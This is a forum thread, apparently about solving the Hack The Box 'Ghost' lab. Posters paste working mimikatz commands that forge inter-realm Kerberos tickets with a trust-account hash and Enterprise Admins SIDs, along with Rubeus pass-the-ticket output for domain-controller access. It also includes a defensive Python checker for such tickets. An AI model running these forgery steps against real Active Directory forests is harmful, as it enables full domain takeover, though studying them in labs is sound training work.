Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote:
(Jul 16, 2024, 05:50 PM)standby123 Wrote: Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.

You gotta use the gMSA to sign your message and then it will be accepted by ADFS.

I am in GHOST-CORP; do I need to access the DC?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password. Any hint about it?
Reply
mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*] Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

Notice the user and SID that I set.
If it's a golden ticket attack, it must use the RC4 hash of the `krbtgt` account.
But in this case, the RC4 hash must be that of the `GHOST$` account. Why is that?
Is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather a modified one?
I bet this was misconfigured in the first place, but so many questions.
Reply
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote:
(Jul 16, 2024, 05:50 PM)standby123 Wrote: Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.

You gotta use the gMSA to sign your message and then it will be accepted by ADFS.

I am in GHOST-CORP; do I need to access the DC?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password. Any hint about it?

If you are already in GHOST-CORP, and I guess that means the PRIMARY server, you do not need to get to ADFS or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

Reply
PS C:\Users\Public\Documents> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

  .#####.  mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##      > https://blog.gentilkiwi.com/mimikatz
'## v ##'      Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-179904498-502
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/16/2024 1:40:24 PM ; 7/14/2034 1:40:24 PM ; 7/14/2034 1:40:24 PM
-> Ticket : golden.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!




PS C:\Users\Public\Documents> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*] Using domain controller: dc01.ghost.htb (10.129.196.127)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  CIFS/dc01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  Administrator
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 8:05:04 AM
  EndTime                  :  7/17/2024 6:05:04 PM
  RenewTill                :  7/24/2024 8:05:04 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  i56wjYvTF8T+/M7Qt4b0LDd+PFpNZCUdQO0IWC6LgmM=
PS C:\Users\Public\Documents> dir \\DC01.ghost.htb\c$
dir \\DC01.ghost.htb\c$
dir : Access is denied


Still no access ;(
Can someone give me a hint about what I'm doing wrong?

Thx
Reply
(Jul 17, 2024, 02:22 PM)cutearmadillo Wrote:
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote: You gotta use the gMSA to sign your message and then it will be accepted by ADFS.

I am in GHOST-CORP; do I need to access the DC?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password. Any hint about it?

If you are already in GHOST-CORP, and I guess that means the PRIMARY server, you do not need to get to ADFS or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

Yes, but this is the unintended way I have done it; I am trying to solve it using ADFS, and I am struggling with that.
Reply
(Jul 17, 2024, 03:27 PM)B00by Wrote: PS C:\Users\Public\Documents> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

  .#####.  mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##      > https://blog.gentilkiwi.com/mimikatz
'## v ##'      Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-179904498-502
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/16/2024 1:40:24 PM ; 7/14/2034 1:40:24 PM ; 7/14/2034 1:40:24 PM
-> Ticket : golden.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!




PS C:\Users\Public\Documents> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*] Using domain controller: dc01.ghost.htb (10.129.196.127)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  CIFS/dc01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  Administrator
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 8:05:04 AM
  EndTime                  :  7/17/2024 6:05:04 PM
  RenewTill                :  7/24/2024 8:05:04 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  i56wjYvTF8T+/M7Qt4b0LDd+PFpNZCUdQO0IWC6LgmM=
PS C:\Users\Public\Documents> dir \\DC01.ghost.htb\c$
dir \\DC01.ghost.htb\c$
dir : Access is denied


Still no access ;(
Can someone give me a hint about what I'm doing wrong?

Thx

Do a kerberos::purge in mimikatz then do your TGS ask again.
Reply
(Jul 17, 2024, 05:47 PM)standby123 Wrote:
(Jul 17, 2024, 02:22 PM)cutearmadillo Wrote:
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote: I am in GHOST-CORP; do I need to access the DC?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password. Any hint about it?

If you are already in GHOST-CORP, and I guess that means the PRIMARY server, you do not need to get to ADFS or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

Yes, but this is the unintended way I have done it; I am trying to solve it using ADFS, and I am struggling with that.

Within the intranet there's a discussion between justin and kathryn talking about a missing DNS entry. Set the DNS entry, receive a hash, crack it and proceed from there.

Reply
thx @b4rfm0uth => kerberos::purge was the key.
Reply
(Jul 17, 2024, 12:48 PM)floridaman389 Wrote:
mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*] Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

Notice the user and SID that I set.
If it's a golden ticket attack, it must use the RC4 hash of the `krbtgt` account.
But in this case, the RC4 hash must be that of the `GHOST$` account. Why is that?
Is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather a modified one?
I bet this was misconfigured in the first place, but so many questions.

Technically, this isn't a "Golden Ticket"; it's rather an abuse of the misconfigured "Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which leads to a full Forest compromise, and this CORP is simply finished off... mimikatz just doesn't know about "Forest Trusts" compromises.

[Image: cs2.png]
Reply
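A defender-side check for the ticket shape discussed above (a CORP.GHOST.HTB account whose extra SIDs carry the forest root's Enterprise Admins RID 519), added here as an example and not code from the thread: it parses the identity fields mimikatz prints for kerberos::golden, flags privileged extra SIDs that belong to a different domain than the user's own, and shows what a trust with quarantine SID filtering would strip. The function names, the TicketIdentity class and the CORP domain SID passed to the filter are assumptions.

```python
import re
from dataclasses import dataclass, field

# Well-known privileged group RIDs (the same numbers mimikatz lists under "Groups Id").
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins",
                   519: "Enterprise Admins", 520: "Group Policy Creator Owners"}

# Domain SID = S-1-5-21-<a>-<b>-<c>; the final component is the RID.
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)$")


def split_sid(sid):
    """Return (domain_sid, rid) for a domain account/group SID, or None otherwise."""
    m = DOMAIN_SID_RE.match(sid.strip())
    return (m.group(1), int(m.group(2))) if m else None


@dataclass
class TicketIdentity:
    user: str
    domain: str
    user_sid: str
    extra_sids: list = field(default_factory=list)


def parse_mimikatz_golden(output):
    """Pull User, Domain, SID and Extra SIDs out of mimikatz kerberos::golden output."""
    fields = {}
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    extra = [s.strip() for s in fields.get("Extra SIDs", "").split(";") if s.strip()]
    # "Domain    : CORP.GHOST.HTB (CORP)" -> keep only the DNS name.
    return TicketIdentity(fields["User"], fields["Domain"].split()[0], fields["SID"], extra)


def foreign_privileged_sids(ticket):
    """Extra SIDs naming a privileged group in a domain other than the user's own.
    That is the shape of the ticket in the thread: a CORP.GHOST.HTB account whose
    SID history carries the forest root's Enterprise Admins SID (RID 519)."""
    own = split_sid(ticket.user_sid)
    own_domain = own[0] if own else None
    findings = []
    for sid in ticket.extra_sids:
        parts = split_sid(sid)
        if parts and parts[0] != own_domain and parts[1] in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[parts[1]]))
    return findings


def quarantine_sid_filter(ticket, trusted_domain_sid):
    """What the trusting side does with quarantine SID filtering enabled on the trust:
    keep only extra SIDs whose domain part is the trusted domain the ticket came from."""
    kept = [s for s in ticket.extra_sids
            if (p := split_sid(s)) is not None and p[0] == trusted_domain_sid]
    return TicketIdentity(ticket.user, ticket.domain, ticket.user_sid, kept)


# Constructed sample: the identity block mimikatz printed in the thread, without the key line.
SAMPLE_GOLDEN_OUTPUT = """\
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID       : S-1-5-21-2034262909-2733679486-179904498-502
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
Target    : GHOST.HTB
"""

if __name__ == "__main__":
    ticket = parse_mimikatz_golden(SAMPLE_GOLDEN_OUTPUT)
    for sid, group in foreign_privileged_sids(ticket):
        print(f"ALERT: {ticket.user}@{ticket.domain} carries foreign {group} SID {sid}")
    # Assumed: the CORP domain SID is the prefix of the user SID above.
    filtered = quarantine_sid_filter(ticket, "S-1-5-21-2034262909-2733679486-179904498")
    print("extra SIDs after quarantine filtering:", filtered.extra_sids)
```

The same check applies to the PAC of a real ticket or to the SID list in a 4624/4769 event; the parser here only exists so the sample from the thread can be fed in as text.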
(Jul 17, 2024, 09:16 PM)mazafaka555 Wrote:
(Jul 17, 2024, 12:48 PM)floridaman389 Wrote:
mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*] Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

Notice the user and SID that I set.
If it's a golden ticket attack, it must use the RC4 hash of the `krbtgt` account.
But in this case, the RC4 hash must be that of the `GHOST$` account. Why is that?
Is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather a modified one?
I bet this was misconfigured in the first place, but so many questions.

Technically, this isn't a "Golden Ticket"; it's rather an abuse of the misconfigured "Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which leads to a full Forest compromise, and this CORP is simply finished off... mimikatz just doesn't know about "Forest Trusts" compromises.

[Image: cs2.png]

wtf, man, why can you jump? I can't jump; please show the command T_T

Reply